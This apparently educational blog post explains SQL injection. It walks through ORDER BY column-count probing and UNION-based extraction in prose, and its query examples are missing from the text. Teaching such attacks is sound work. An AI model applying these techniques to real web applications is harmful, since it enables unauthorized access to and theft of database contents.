The vulnerability that we are going to see today is also code injection, but in this case, on the server-side, more precisely, the database service in which the information of the web page is stored. If an attacker gains access to this database, he can make some really dangerous actions.
What Is SQL Injection?
Given the need to use dynamic content in today’s web applications, many of them depend on a database to store the data that will be requested and processed by the web application. Web applications perform queries on these databases to access the data stored there. To perform these queries, a structured query language or SQL (Structured Query Language) is used.
To understand it better, we will see an example. They made us a web page for our company in which we have a private area where it is required to enter a username and password to access. This web page stores the login data in a database called “Society.”
The web application will query to retrieve the data from the database for display. The SELECT statement will be used to perform this query. With it, once the database and the table you are interested in are located, you can filter the data to show certain records, for example, the records in the Users table where the id column is equal to 1. To do this, the WHERE clause. This is what the instruction would look like:
How Does SQL Injection Work?
An SQL injection attack occurs when a value in the client query is used in an SQL query without first sanitizing. If, as web developers, we have not cleaned up the code and we trust the data provided by the users. The attackers can extract hidden information from the databases or take control of the server.
For example.If the previous query where we were looking at the record with id one is done on a web page to display the user’s data. We say that we want it to order the output data by column number 10.
As can be seen, this indicates that column 10 is unknown. Column 10 clearly doesn’t exist since we only have 4. But the attackers are interested in knowing the number of columns in the table. If we order it by 4, the data is already displayed:
Once the attacker knows the number of columns of the table we are querying. He will perform a 4-column query joining it to the current query through the UNION clause:
SQL Injection Example
We can think that this type of SQL injection is based on errors. Will take advantage of the error that will be reported to us on the site to list the privileged information of the database.
Also, have a text box on a web page where we type in our username and password. And when we run it, our account details appear on the page. For this, we have previously created an account in this web application. The username is ‘extra,’ and the password is ‘password123.’